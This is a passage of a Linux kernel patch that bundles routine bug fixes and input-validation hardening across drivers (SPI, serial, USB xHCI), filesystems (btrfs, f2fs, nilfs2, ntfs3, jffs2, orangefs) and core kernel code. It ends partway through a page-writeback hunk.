+--- a/drivers/spi/spi-cadence-xspi.c
++++ b/drivers/spi/spi-cadence-xspi.c
+@@ -146,6 +146,9 @@
+ #define CDNS_XSPI_STIG_DONE_FLAG		BIT(0)
+ #define CDNS_XSPI_TRD_STATUS			0x0104
+ 
++#define MODE_NO_OF_BYTES			GENMASK(25, 24)
++#define MODEBYTES_COUNT			1
++
+ /* Helper macros for filling command registers */
+ #define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_1(op, data_phase) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_INSTR_TYPE, (data_phase) ? \
+@@ -158,9 +161,10 @@
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R2_ADDR3, ((op)->addr.val >> 24) & 0xFF) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R2_ADDR4, ((op)->addr.val >> 32) & 0xFF))
+ 
+-#define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op) ( \
++#define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, modebytes) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_ADDR5, ((op)->addr.val >> 40) & 0xFF) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_CMD, (op)->cmd.opcode) | \
++	FIELD_PREP(MODE_NO_OF_BYTES, modebytes) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_P1_R3_NUM_ADDR_BYTES, (op)->addr.nbytes))
+ 
+ #define CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_4(op, chipsel) ( \
+@@ -174,12 +178,12 @@
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_2(op) \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R2_DCNT_L, (op)->data.nbytes & 0xFFFF)
+ 
+-#define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op) ( \
++#define CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op, dummybytes) ( \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_DCNT_H, \
+ 		((op)->data.nbytes >> 16) & 0xffff) | \
+ 	FIELD_PREP(CDNS_XSPI_CMD_DSEQ_R3_NUM_OF_DUMMY, \
+ 		  (op)->dummy.buswidth != 0 ? \
+-		  (((op)->dummy.nbytes * 8) / (op)->dummy.buswidth) : \
++		  (((dummybytes) * 8) / (op)->dummy.buswidth) : \
+ 		  0))
+ 
+ #define CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op, chipsel) ( \
+@@ -352,6 +356,7 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 	u32 cmd_regs[6];
+ 	u32 cmd_status;
+ 	int ret;
++	int dummybytes = op->dummy.nbytes;
+ 
+ 	ret = cdns_xspi_wait_for_controller_idle(cdns_xspi);
+ 	if (ret < 0)
+@@ -366,7 +371,12 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 	memset(cmd_regs, 0, sizeof(cmd_regs));
+ 	cmd_regs[1] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_1(op, data_phase);
+ 	cmd_regs[2] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_2(op);
+-	cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op);
++	if (dummybytes != 0) {
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, 1);
++		dummybytes--;
++	} else {
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_3(op, 0);
++	}
+ 	cmd_regs[4] = CDNS_XSPI_CMD_FLD_P1_INSTR_CMD_4(op,
+ 						       cdns_xspi->cur_cs);
+ 
+@@ -376,7 +386,7 @@ static int cdns_xspi_send_stig_command(struct cdns_xspi_dev *cdns_xspi,
+ 		cmd_regs[0] = CDNS_XSPI_STIG_DONE_FLAG;
+ 		cmd_regs[1] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_1(op);
+ 		cmd_regs[2] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_2(op);
+-		cmd_regs[3] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op);
++		cmd_regs[3] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_3(op, dummybytes);
+ 		cmd_regs[4] = CDNS_XSPI_CMD_FLD_DSEQ_CMD_4(op,
+ 							   cdns_xspi->cur_cs);
+ 
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 40e59e72d5e9e..5acbab0512b82 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -1303,7 +1303,7 @@ static void imx_uart_clear_rx_errors(struct imx_port *sport)
+ 
+ }
+ 
+-#define TXTL_DEFAULT 2 /* reset default */
++#define TXTL_DEFAULT 8
+ #define RXTL_DEFAULT 8 /* 8 characters or aging timer */
+ #define TXTL_DMA 8 /* DMA burst setting */
+ #define RXTL_DMA 9 /* DMA burst setting */
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index 7549c430c4f01..be5b0ff2966fe 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2631,16 +2631,17 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 			else
+ 				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+ 							    EP_SOFT_RESET);
+-			goto cleanup;
++			break;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+ 		case COMP_STOPPED_LENGTH_INVALID:
+-			goto cleanup;
++			break;
+ 		default:
+ 			xhci_err(xhci, "ERROR Transfer event for unknown stream ring slot %u ep %u\n",
+ 				 slot_id, ep_index);
+ 			goto err_out;
+ 		}
++		return 0;
+ 	}
+ 
+ 	/* Count current td numbers if ep->skip is set */
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 77f24168c7ed2..676978f2e9944 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1720,8 +1720,17 @@ void btrfs_reclaim_bgs_work(struct work_struct *work)
+ next:
+ 		if (ret) {
+ 			/* Refcount held by the reclaim_bgs list after splice. */
+-			btrfs_get_block_group(bg);
+-			list_add_tail(&bg->bg_list, &retry_list);
++			spin_lock(&fs_info->unused_bgs_lock);
++			/*
++			 * This block group might be added to the unused list
++			 * during the above process. Move it back to the
++			 * reclaim list otherwise.
++			 */
++			if (list_empty(&bg->bg_list)) {
++				btrfs_get_block_group(bg);
++				list_add_tail(&bg->bg_list, &retry_list);
++			}
++			spin_unlock(&fs_info->unused_bgs_lock);
+ 		}
+ 		btrfs_put_block_group(bg);
+ 
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 12a2b1e3f1e35..f48895a9b165e 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
+@@ -3407,7 +3407,7 @@ static int scrub_simple_mirror(struct scrub_ctx *sctx,
+ 	const u32 max_length = SZ_64K;
+ 	struct btrfs_path path = { 0 };
+ 	u64 cur_logical = logical_start;
+-	int ret;
++	int ret = 0;
+ 
+ 	/* The range must be inside the bg */
+ 	ASSERT(logical_start >= bg->start && logical_end <= bg->start + bg->length);
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index b54d681c6457d..a02c748753161 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -68,7 +68,7 @@ enum {
+ 
+ struct f2fs_fault_info {
+ 	atomic_t inject_ops;
+-	unsigned int inject_rate;
++	int inject_rate;
+ 	unsigned int inject_type;
+ };
+ 
+@@ -4530,10 +4530,14 @@ static inline bool f2fs_need_verity(const struct inode *inode, pgoff_t idx)
+ }
+ 
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-extern void f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned int rate,
+-							unsigned int type);
++extern int f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned long rate,
++							unsigned long type);
+ #else
+-#define f2fs_build_fault_attr(sbi, rate, type)		do { } while (0)
++static inline int f2fs_build_fault_attr(struct f2fs_sb_info *sbi,
++					unsigned long rate, unsigned long type)
++{
++	return 0;
++}
+ #endif
+ 
+ static inline bool is_journalled_quota(struct f2fs_sb_info *sbi)
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index f496622921843..6bd8c231069ad 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -63,21 +63,31 @@ const char *f2fs_fault_name[FAULT_MAX] = {
+ 	[FAULT_LOCK_OP]		= "lock_op",
+ };
+ 
+-void f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned int rate,
+-							unsigned int type)
++int f2fs_build_fault_attr(struct f2fs_sb_info *sbi, unsigned long rate,
++							unsigned long type)
+ {
+ 	struct f2fs_fault_info *ffi = &F2FS_OPTION(sbi).fault_info;
+ 
+ 	if (rate) {
++		if (rate > INT_MAX)
++			return -EINVAL;
+ 		atomic_set(&ffi->inject_ops, 0);
+-		ffi->inject_rate = rate;
++		ffi->inject_rate = (int)rate;
+ 	}
+ 
+-	if (type)
+-		ffi->inject_type = type;
++	if (type) {
++		if (type >= BIT(FAULT_MAX))
++			return -EINVAL;
++		ffi->inject_type = (unsigned int)type;
++	}
+ 
+ 	if (!rate && !type)
+ 		memset(ffi, 0, sizeof(struct f2fs_fault_info));
++	else
++		f2fs_info(sbi,
++			"build fault injection attr: rate: %lu, type: 0x%lx",
++								rate, type);
++	return 0;
+ }
+ #endif
+ 
+@@ -916,14 +926,17 @@ static int parse_options(struct super_block *sb, char *options, bool is_remount)
+ 		case Opt_fault_injection:
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+-			f2fs_build_fault_attr(sbi, arg, F2FS_ALL_FAULT_TYPE);
++			if (f2fs_build_fault_attr(sbi, arg,
++					F2FS_ALL_FAULT_TYPE))
++				return -EINVAL;
+ 			set_opt(sbi, FAULT_INJECTION);
+ 			break;
+ 
+ 		case Opt_fault_type:
+ 			if (args->from && match_int(args, &arg))
+ 				return -EINVAL;
+-			f2fs_build_fault_attr(sbi, 0, arg);
++			if (f2fs_build_fault_attr(sbi, 0, arg))
++				return -EINVAL;
+ 			set_opt(sbi, FAULT_INJECTION);
+ 			break;
+ #else
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index 751a108e612ff..06d5791afe90e 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -451,10 +451,16 @@ static ssize_t __sbi_store(struct f2fs_attr *a,
+ 	if (ret < 0)
+ 		return ret;
+ #ifdef CONFIG_F2FS_FAULT_INJECTION
+-	if (a->struct_type == FAULT_INFO_TYPE && t >= BIT(FAULT_MAX))
+-		return -EINVAL;
+-	if (a->struct_type == FAULT_INFO_RATE && t >= UINT_MAX)
+-		return -EINVAL;
++	if (a->struct_type == FAULT_INFO_TYPE) {
++		if (f2fs_build_fault_attr(sbi, 0, t))
++			return -EINVAL;
++		return count;
++	}
++	if (a->struct_type == FAULT_INFO_RATE) {
++		if (f2fs_build_fault_attr(sbi, t, 0))
++			return -EINVAL;
++		return count;
++	}
+ #endif
+ 	if (a->struct_type == RESERVED_BLOCKS) {
+ 		spin_lock(&sbi->stat_lock);
+diff --git a/fs/jffs2/super.c b/fs/jffs2/super.c
+index 7ea37f49f1e18..e71f4c94c4483 100644
+--- a/fs/jffs2/super.c
++++ b/fs/jffs2/super.c
+@@ -58,6 +58,7 @@ static void jffs2_i_init_once(void *foo)
+ 	struct jffs2_inode_info *f = foo;
+ 
+ 	mutex_init(&f->sem);
++	f->target = NULL;
+ 	inode_init_once(&f->vfs_inode);
+ }
+ 
+diff --git a/fs/nilfs2/alloc.c b/fs/nilfs2/alloc.c
+index 7342de296ec3c..25881bdd212b8 100644
+--- a/fs/nilfs2/alloc.c
++++ b/fs/nilfs2/alloc.c
+@@ -377,11 +377,12 @@ void *nilfs_palloc_block_get_entry(const struct inode *inode, __u64 nr,
+  * @target: offset number of an entry in the group (start point)
+  * @bsize: size in bits
+  * @lock: spin lock protecting @bitmap
++ * @wrap: whether to wrap around
+  */
+ static int nilfs_palloc_find_available_slot(unsigned char *bitmap,
+ 					    unsigned long target,
+ 					    unsigned int bsize,
+-					    spinlock_t *lock)
++					    spinlock_t *lock, bool wrap)
+ {
+ 	int pos, end = bsize;
+ 
+@@ -397,6 +398,8 @@ static int nilfs_palloc_find_available_slot(unsigned char *bitmap,
+ 
+ 		end = target;
+ 	}
++	if (!wrap)
++		return -ENOSPC;
+ 
+ 	/* wrap around */
+ 	for (pos = 0; pos < end; pos++) {
+@@ -495,9 +498,10 @@ int nilfs_palloc_count_max_entries(struct inode *inode, u64 nused, u64 *nmaxp)
+  * nilfs_palloc_prepare_alloc_entry - prepare to allocate a persistent object
+  * @inode: inode of metadata file using this allocator
+  * @req: nilfs_palloc_req structure exchanged for the allocation
++ * @wrap: whether to wrap around
+  */
+ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+-				     struct nilfs_palloc_req *req)
++				     struct nilfs_palloc_req *req, bool wrap)
+ {
+ 	struct buffer_head *desc_bh, *bitmap_bh;
+ 	struct nilfs_palloc_group_desc *desc;
+@@ -516,7 +520,7 @@ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+ 	entries_per_group = nilfs_palloc_entries_per_group(inode);
+ 
+ 	for (i = 0; i < ngroups; i += n) {
+-		if (group >= ngroups) {
++		if (group >= ngroups && wrap) {
+ 			/* wrap around */
+ 			group = 0;
+ 			maxgroup = nilfs_palloc_group(inode, req->pr_entry_nr,
+@@ -541,7 +545,13 @@ int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
+ 				bitmap = bitmap_kaddr + bh_offset(bitmap_bh);
+ 				pos = nilfs_palloc_find_available_slot(
+ 					bitmap, group_offset,
+-					entries_per_group, lock);
++					entries_per_group, lock, wrap);
++				/*
++				 * Since the search for a free slot in the
++				 * second and subsequent bitmap blocks always
++				 * starts from the beginning, the wrap flag
++				 * only has an effect on the first search.
++				 */
+ 				if (pos >= 0) {
+ 					/* found a free entry */
+ 					nilfs_palloc_group_desc_add_entries(
+diff --git a/fs/nilfs2/alloc.h b/fs/nilfs2/alloc.h
+index b667e869ac076..d825a9faca6d9 100644
+--- a/fs/nilfs2/alloc.h
++++ b/fs/nilfs2/alloc.h
+@@ -50,8 +50,8 @@ struct nilfs_palloc_req {
+ 	struct buffer_head *pr_entry_bh;
+ };
+ 
+-int nilfs_palloc_prepare_alloc_entry(struct inode *,
+-				     struct nilfs_palloc_req *);
++int nilfs_palloc_prepare_alloc_entry(struct inode *inode,
++				     struct nilfs_palloc_req *req, bool wrap);
+ void nilfs_palloc_commit_alloc_entry(struct inode *,
+ 				     struct nilfs_palloc_req *);
+ void nilfs_palloc_abort_alloc_entry(struct inode *, struct nilfs_palloc_req *);
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 1e7f653c1df7e..242cc36bf1e97 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -75,7 +75,7 @@ int nilfs_dat_prepare_alloc(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+ 	int ret;
+ 
+-	ret = nilfs_palloc_prepare_alloc_entry(dat, req);
++	ret = nilfs_palloc_prepare_alloc_entry(dat, req, true);
+ 	if (ret < 0)
+ 		return ret;
+ 
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index e9668e455a35e..4bba1970ad333 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -143,6 +143,9 @@ static bool nilfs_check_page(struct page *page)
+ 			goto Enamelen;
+ 		if (((offs + rec_len - 1) ^ offs) & ~(chunk_size-1))
+ 			goto Espan;
++		if (unlikely(p->inode &&
++			     NILFS_PRIVATE_INODE(le64_to_cpu(p->inode))))
++			goto Einumber;
+ 	}
+ 	if (offs != limit)
+ 		goto Eend;
+@@ -168,6 +171,9 @@ static bool nilfs_check_page(struct page *page)
+ 	goto bad_entry;
+ Espan:
+ 	error = "directory entry across blocks";
++	goto bad_entry;
++Einumber:
++	error = "disallowed inode number";
+ bad_entry:
+ 	nilfs_error(sb,
+ 		    "bad entry in directory #%lu: %s - offset=%lu, inode=%lu, rec_len=%d, name_len=%d",
+diff --git a/fs/nilfs2/ifile.c b/fs/nilfs2/ifile.c
+index a8a4bc8490b4d..ac10a62a41e98 100644
+--- a/fs/nilfs2/ifile.c
++++ b/fs/nilfs2/ifile.c
+@@ -55,13 +55,10 @@ int nilfs_ifile_create_inode(struct inode *ifile, ino_t *out_ino,
+ 	struct nilfs_palloc_req req;
+ 	int ret;
+ 
+-	req.pr_entry_nr = 0;  /*
+-			       * 0 says find free inode from beginning
+-			       * of a group. dull code!!
+-			       */
++	req.pr_entry_nr = NILFS_FIRST_INO(ifile->i_sb);
+ 	req.pr_entry_bh = NULL;
+ 
+-	ret = nilfs_palloc_prepare_alloc_entry(ifile, &req);
++	ret = nilfs_palloc_prepare_alloc_entry(ifile, &req, false);
+ 	if (!ret) {
+ 		ret = nilfs_palloc_get_entry_block(ifile, req.pr_entry_nr, 1,
+ 						   &req.pr_entry_bh);
+diff --git a/fs/nilfs2/nilfs.h b/fs/nilfs2/nilfs.h
+index aecda4fc95f5f..a1ff52265e1b0 100644
+--- a/fs/nilfs2/nilfs.h
++++ b/fs/nilfs2/nilfs.h
+@@ -116,9 +116,15 @@ enum {
+ #define NILFS_FIRST_INO(sb) (((struct the_nilfs *)sb->s_fs_info)->ns_first_ino)
+ 
+ #define NILFS_MDT_INODE(sb, ino) \
+-	((ino) < NILFS_FIRST_INO(sb) && (NILFS_MDT_INO_BITS & BIT(ino)))
++	((ino) < NILFS_USER_INO && (NILFS_MDT_INO_BITS & BIT(ino)))
+ #define NILFS_VALID_INODE(sb, ino) \
+-	((ino) >= NILFS_FIRST_INO(sb) || (NILFS_SYS_INO_BITS & BIT(ino)))
++	((ino) >= NILFS_FIRST_INO(sb) ||				\
++	 ((ino) < NILFS_USER_INO && (NILFS_SYS_INO_BITS & BIT(ino))))
++
++#define NILFS_PRIVATE_INODE(ino) ({					\
++	ino_t __ino = (ino);						\
++	((__ino) < NILFS_USER_INO && (__ino) != NILFS_ROOT_INO &&	\
++	 (__ino) != NILFS_SKETCH_INO); })
+ 
+ /**
+  * struct nilfs_transaction_info: context information for synchronization
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 71400496ed365..be41e26b78246 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -452,6 +452,12 @@ static int nilfs_store_disk_layout(struct the_nilfs *nilfs,
+ 	}
+ 
+ 	nilfs->ns_first_ino = le32_to_cpu(sbp->s_first_ino);
++	if (nilfs->ns_first_ino < NILFS_USER_INO) {
++		nilfs_err(nilfs->ns_sb,
++			  "too small lower limit for non-reserved inode numbers: %u",
++			  nilfs->ns_first_ino);
++		return -EINVAL;
++	}
+ 
+ 	nilfs->ns_blocks_per_segment = le32_to_cpu(sbp->s_blocks_per_segment);
+ 	if (nilfs->ns_blocks_per_segment < NILFS_SEG_MIN_BLOCKS) {
+diff --git a/fs/nilfs2/the_nilfs.h b/fs/nilfs2/the_nilfs.h
+index cd4ae1b8ae165..17fee562ee503 100644
+--- a/fs/nilfs2/the_nilfs.h
++++ b/fs/nilfs2/the_nilfs.h
+@@ -182,7 +182,7 @@ struct the_nilfs {
+ 	unsigned long		ns_nrsvsegs;
+ 	unsigned long		ns_first_data_block;
+ 	int			ns_inode_size;
+-	int			ns_first_ino;
++	unsigned int		ns_first_ino;
+ 	u32			ns_crc_seed;
+ 
+ 	/* /sys/fs/<nilfs>/<device> */
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index d98cf7b382bcc..2e4eea854bda5 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -217,8 +217,11 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 		if (!ea->name_len)
+ 			break;
+ 
+-		if (ea->name_len > ea_size)
++		if (ea->name_len > ea_size) {
++			ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++			err = -EINVAL; /* corrupted fs */
+ 			break;
++		}
+ 
+ 		if (buffer) {
+ 			/* Check if we can use field ea->name */
+diff --git a/fs/orangefs/super.c b/fs/orangefs/super.c
+index 4ca8ed410c3cf..24e028c119c1b 100644
+--- a/fs/orangefs/super.c
++++ b/fs/orangefs/super.c
+@@ -201,7 +201,8 @@ static int orangefs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 		     (long)new_op->downcall.resp.statfs.files_avail);
+ 
+ 	buf->f_type = sb->s_magic;
+-	memcpy(&buf->f_fsid, &ORANGEFS_SB(sb)->fs_id, sizeof(buf->f_fsid));
++	buf->f_fsid.val[0] = ORANGEFS_SB(sb)->fs_id;
++	buf->f_fsid.val[1] = ORANGEFS_SB(sb)->id;
+ 	buf->f_bsize = new_op->downcall.resp.statfs.block_size;
+ 	buf->f_namelen = ORANGEFS_NAME_MAX;
+ 
+diff --git a/include/linux/fsnotify.h b/include/linux/fsnotify.h
+index bb8467cd11ae2..34f242105be23 100644
+--- a/include/linux/fsnotify.h
++++ b/include/linux/fsnotify.h
+@@ -93,7 +93,13 @@ static inline int fsnotify_file(struct file *file, __u32 mask)
+ {
+ 	const struct path *path = &file->f_path;
+ 
+-	if (file->f_mode & FMODE_NONOTIFY)
++	/*
++	 * FMODE_NONOTIFY are fds generated by fanotify itself which should not
++	 * generate new events. We also don't want to generate events for
++	 * FMODE_PATH fds (involves open & close events) as they are just
++	 * handle creation / destruction events and not "real" file events.
++	 */
++	if (file->f_mode & (FMODE_NONOTIFY | FMODE_PATH))
+ 		return 0;
+ 
+ 	return fsnotify_parent(path->dentry, mask, path, FSNOTIFY_EVENT_PATH);
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 6239a378c0ea8..0b4f7289951a4 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -382,7 +382,7 @@ LSM_HOOK(int, 0, key_getsecurity, struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ LSM_HOOK(int, 0, audit_rule_init, u32 field, u32 op, char *rulestr,
+-	 void **lsmrule)
++	 void **lsmrule, gfp_t gfp)
+ LSM_HOOK(int, 0, audit_rule_known, struct audit_krule *krule)
+ LSM_HOOK(int, 0, audit_rule_match, u32 secid, u32 field, u32 op, void *lsmrule)
+ LSM_HOOK(void, LSM_RET_VOID, audit_rule_free, void *lsmrule)
+diff --git a/include/linux/mutex.h b/include/linux/mutex.h
+index a33aa9eb9fc3b..5b5630e58407a 100644
+--- a/include/linux/mutex.h
++++ b/include/linux/mutex.h
+@@ -21,6 +21,8 @@
+ #include <linux/debug_locks.h>
+ #include <linux/cleanup.h>
+ 
++struct device;
++
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __DEP_MAP_MUTEX_INITIALIZER(lockname)			\
+ 		, .dep_map = {					\
+@@ -171,6 +173,31 @@ do {							\
+ } while (0)
+ #endif /* CONFIG_PREEMPT_RT */
+ 
++#ifdef CONFIG_DEBUG_MUTEXES
++
++int __devm_mutex_init(struct device *dev, struct mutex *lock);
++
++#else
++
++static inline int __devm_mutex_init(struct device *dev, struct mutex *lock)
++{
++	/*
++	 * When CONFIG_DEBUG_MUTEXES is off mutex_destroy() is just a nop so
++	 * no really need to register it in the devm subsystem.
++	 */
++	return 0;
++}
++
++#endif
++
++#define devm_mutex_init(dev, mutex)			\
++({							\
++	typeof(mutex) mutex_ = (mutex);			\
++							\
++	mutex_init(mutex_);				\
++	__devm_mutex_init(dev, mutex_);			\
++})
++
+ /*
+  * See kernel/locking/mutex.c for detailed documentation of these APIs.
+  * Also see Documentation/locking/mutex-design.rst.
+diff --git a/include/linux/security.h b/include/linux/security.h
+index 2772f6375f140..c33c95f409eb6 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -1921,7 +1921,8 @@ static inline int security_key_getsecurity(struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ #ifdef CONFIG_SECURITY
+-int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule);
++int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule,
++			     gfp_t gfp);
+ int security_audit_rule_known(struct audit_krule *krule);
+ int security_audit_rule_match(u32 secid, u32 field, u32 op, void *lsmrule);
+ void security_audit_rule_free(void *lsmrule);
+@@ -1929,7 +1930,7 @@ void security_audit_rule_free(void *lsmrule);
+ #else
+ 
+ static inline int security_audit_rule_init(u32 field, u32 op, char *rulestr,
+-					   void **lsmrule)
++					   void **lsmrule, gfp_t gfp)
+ {
+ 	return 0;
+ }
+diff --git a/kernel/auditfilter.c b/kernel/auditfilter.c
+index 42d99896e7a6e..6c9a4d322309f 100644
+--- a/kernel/auditfilter.c
++++ b/kernel/auditfilter.c
+@@ -529,7 +529,8 @@ static struct audit_entry *audit_data_to_entry(struct audit_rule_data *data,
+ 			entry->rule.buflen += f_val;
+ 			f->lsm_str = str;
+ 			err = security_audit_rule_init(f->type, f->op, str,
+-						       (void **)&f->lsm_rule);
++						       (void **)&f->lsm_rule,
++						       GFP_KERNEL);
+ 			/* Keep currently invalid fields around in case they
+ 			 * become valid after a policy reload. */
+ 			if (err == -EINVAL) {
+@@ -798,7 +799,7 @@ static inline int audit_dupe_lsm_field(struct audit_field *df,
+ 
+ 	/* our own (refreshed) copy of lsm_rule */
+ 	ret = security_audit_rule_init(df->type, df->op, df->lsm_str,
+-				       (void **)&df->lsm_rule);
++				       (void **)&df->lsm_rule, GFP_KERNEL);
+ 	/* Keep currently invalid fields around in case they
+ 	 * become valid after a policy reload. */
+ 	if (ret == -EINVAL) {
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index af661734e8f90..dafdc47ae5fcc 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -252,6 +252,9 @@ static long map_benchmark_ioctl(struct file *file, unsigned int cmd,
+ 		 * dma_mask changed by benchmark
+ 		 */
+ 		dma_set_mask(map->dev, old_dma_mask);
++
++		if (ret)
++			return ret;
+ 		break;
+ 	default:
+ 		return -EINVAL;
+diff --git a/kernel/exit.c b/kernel/exit.c
+index bccfa4218356e..156283b3c1bf6 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -481,6 +481,8 @@ void mm_update_next_owner(struct mm_struct *mm)
+ 	 * Search through everything else, we should not get here often.
+ 	 */
+ 	for_each_process(g) {
++		if (atomic_read(&mm->mm_users) <= 1)
++			break;
+ 		if (g->flags & PF_KTHREAD)
+ 			continue;
+ 		for_each_thread(g, c) {
+diff --git a/kernel/locking/mutex-debug.c b/kernel/locking/mutex-debug.c
+index bc8abb8549d20..6e6f6071cfa27 100644
+--- a/kernel/locking/mutex-debug.c
++++ b/kernel/locking/mutex-debug.c
+@@ -12,6 +12,7 @@
+  */
+ #include <linux/mutex.h>
+ #include <linux/delay.h>
++#include <linux/device.h>
+ #include <linux/export.h>
+ #include <linux/poison.h>
+ #include <linux/sched.h>
+@@ -89,6 +90,17 @@ void debug_mutex_init(struct mutex *lock, const char *name,
+ 	lock->magic = lock;
+ }
+ 
++static void devm_mutex_release(void *res)
++{
++	mutex_destroy(res);
++}
++
++int __devm_mutex_init(struct device *dev, struct mutex *lock)
++{
++	return devm_add_action_or_reset(dev, devm_mutex_release, lock);
++}
++EXPORT_SYMBOL_GPL(__devm_mutex_init);
++
+ /***
+  * mutex_destroy - mark a mutex unusable
+  * @lock: the mutex to be destroyed
+diff --git a/lib/kunit/try-catch.c b/lib/kunit/try-catch.c
+index d9d1df28cc52e..9c9e4dcf06d96 100644
+--- a/lib/kunit/try-catch.c
++++ b/lib/kunit/try-catch.c
+@@ -78,7 +78,6 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 	time_remaining = wait_for_completion_timeout(&try_completion,
+ 						     kunit_test_timeout());
+ 	if (time_remaining == 0) {
+-		kunit_err(test, "try timed out\n");
+ 		try_catch->try_result = -ETIMEDOUT;
+ 		kthread_stop(task_struct);
+ 	}
+@@ -93,6 +92,8 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 		try_catch->try_result = 0;
+ 	else if (exit_code == -EINTR)
+ 		kunit_err(test, "wake_up_process() was never called\n");
++	else if (exit_code == -ETIMEDOUT)
++		kunit_err(test, "try timed out\n");
+ 	else if (exit_code)
+ 		kunit_err(test, "Unknown error: %d\n", exit_code);
+ 
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index d3e9d12860b9f..7dbac6ede7242 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -414,13 +414,20 @@ static void domain_dirty_limits(struct dirty_throttle_control *dtc)
+ 	else
+ 		bg_thresh = (bg_ratio * available_memory) / PAGE_SIZE;
+ 
+-	if (bg_thresh >= thresh)
+-		bg_thresh = thresh / 2;
+ 	tsk = current;
+ 	if (rt_task(tsk)) {
+ 		bg_thresh += bg_thresh / 4 + global_wb_domain.dirty_limit / 32;
+ 		thresh += thresh / 4 + global_wb_domain.dirty_limit / 32;
+ 	}
++	/*
++	 * Dirty throttling logic assumes the limits in page units fit into
++	 * 32-bits. This gives 16TB dirty limits max which is hopefully enough.
++	 */
